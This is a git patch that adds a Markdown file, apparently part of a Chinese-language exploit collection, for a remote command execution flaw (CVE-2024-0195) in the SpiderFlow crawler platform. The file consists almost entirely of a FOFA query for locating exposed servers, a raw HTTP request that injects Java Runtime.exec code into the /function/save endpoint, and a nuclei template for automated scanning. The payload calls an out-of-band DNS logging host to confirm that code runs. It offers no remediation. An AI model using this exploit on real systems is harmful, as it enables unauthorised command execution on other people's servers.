From fbe799f78a5b231d57847cafcf0977cefd72070c Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Fri, 12 Jan 2024 19:20:44 +0800 Subject: [PATCH] =?UTF-8?q?Create=20SpiderFlow=E7=88=AC=E8=99=AB=E5=B9=B3?= =?UTF-8?q?=E5=8F=B0=E8=BF=9C=E7=A8=8B=E5=91=BD=E4=BB=A4=E6=89=A7=E8=A1=8C?= =?UTF-8?q?=E6=BC=8F=E6=B4=9E(CVE-2024-0195).md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...爬虫平台远程命令执行漏洞(CVE-2024-0195).md | 56 +++++++++++++++++++ 1 file changed, 56 insertions(+) create mode 100644 SpiderFlow爬虫平台远程命令执行漏洞(CVE-2024-0195).md diff --git a/SpiderFlow爬虫平台远程命令执行漏洞(CVE-2024-0195).md b/SpiderFlow爬虫平台远程命令执行漏洞(CVE-2024-0195).md new file mode 100644 index 0000000..727bcfe --- /dev/null +++ b/SpiderFlow爬虫平台远程命令执行漏洞(CVE-2024-0195).md @@ -0,0 +1,56 @@ +## SpiderFlow爬虫平台远程命令执行漏洞(CVE-2024-0195) + +## fofa +``` +app="SpiderFlow" +``` + +## poc +``` +POST /function/save HTTP/1.1 +Host: 192.168.40.130:8088 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 +Connection: close +Content-Length: 121 +Accept: */* +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest + +id=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B +``` + +## nuclei poc +``` +id: CVE-2024-0195 + +info: + name: SpiderFlow爬虫平台RCE漏洞 + author: fgz + severity: critical + description: SpiderFlow是新一代开源爬虫平台,以图形化方式定义爬虫流程,不写代码即可完成爬虫。基于springboot+layui开发的前后端不分离,也可以进行二次开发,因此收到很多人的喜欢,在gitee上有7.4K Star。该系统/function/save接口存在RCE漏洞,攻击者可以构造恶意命令远控服务器。 + metadata: + max-request: 1 + fofa-query: app="SpiderFlow" + verified: true +requests: + - raw: + - |+ + POST /function/save HTTP/1.1 + Host: {{Hostname}} + Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + Accept: */* + Accept-Encoding: gzip, deflate + X-Requested-With: XMLHttpRequest + + id=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+{{interactsh-url}}')%3B%7B + + matchers: + - type: dsl + dsl: + - contains(interactsh_protocol, "dns") + condition: and +```